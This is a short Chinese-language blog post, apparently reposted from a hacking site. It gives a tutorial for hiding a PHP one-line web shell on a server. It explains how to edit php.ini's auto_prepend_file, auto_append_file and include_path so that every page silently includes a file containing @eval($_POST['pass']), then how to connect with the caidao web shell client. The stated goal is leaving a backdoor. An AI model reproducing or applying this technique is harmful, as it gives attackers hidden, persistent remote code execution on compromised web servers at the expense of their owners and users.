利用php中的一个自动在文件中增加页眉和页脚的功能,隐藏一句话。
在站点的某一目录(如:根目录)下编辑文件php脚本文件,名称为:info.php,内容如下
<?php
Phpinfo();
?>
在本地打开如:http://127.0.0.1/info.php
检查系统使用的配置文件
找到并编辑该配置文件
如下行:
auto_prepend_file =test.php #自动将“test.php”中的内容增加到任意文件的页眉位置
auto_append_file =fuck.php #自动将“test.php”中的内容增加到任意文件的页脚位置
如果是unix则修改如下两行
; UNIX: “/path1:/path2”
;include_path = “.:/php/includes”
我使用的是windows
; Windows: “\path1;\path2”
include_path = “E:\PHPnow-1.5.6\htdocs;.”#指定php 中的包含函数首先搜索的路径为“E:\PHPnow-1.5.6\htdocs”然后才是“.”即根。
在“E:\PHPnow-1.5.6\htdocs”创建名称(名称随意,上下保持一致即可)为“test.php”和“fuck.php”的脚本文件,其中包含最关键的一句话内容如下:
<?php
@eval($_POST[‘pass’]); #pass 是密码
?>
使用caidao进行测试,如下:
这样就可以完成使用“php.ini”达到留后门的目的
转自:http://www.hacktxt.com/article/sort012/sort0229/info-37653.html
转载请注明:jinglingshu的博客 » 利用php.ini隐藏一句话